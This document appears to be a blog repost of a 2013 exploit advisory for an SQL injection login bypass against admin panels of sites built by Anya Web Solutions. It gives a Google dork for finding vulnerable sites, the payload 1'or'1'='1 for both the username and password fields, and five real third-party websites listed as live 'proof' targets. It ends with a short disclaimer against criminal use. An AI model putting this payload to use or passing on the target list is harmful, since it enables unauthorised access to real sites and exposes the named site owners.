#********************************************************************************
# Exploit Title : Anya Web Solutions Login Page Bypass
#
# Exploit Author : Ashiyane Digital Security Team
#
# Vendor Homepage : http://www.anyawebsolutions.com
#
# Google Dork : intext:"Powered by Anya Web Solutions" inurl:asp
#
# Date: 2013/10/14
#
# Tested on: Windows 7 , Linux
-------------------------------------------------------------------
# Exploit : Login page bypass
#
# Location : [Target]/admin
#
# Username :1'or'1'='1
#
# Password :1'or'1'='1
######################
# Proof:
#
# http://www.artsmartdallas.net/admin
#
# http://www.bootglams.com/admin
#
# http://www.rreaf.com/admin
#
# http://www.roboticsafarianimals.com/admin
#
# http://www.raglp.com/admin
0 komentar:
Post a Comment
I just a newbie and student, don't using this article for criminal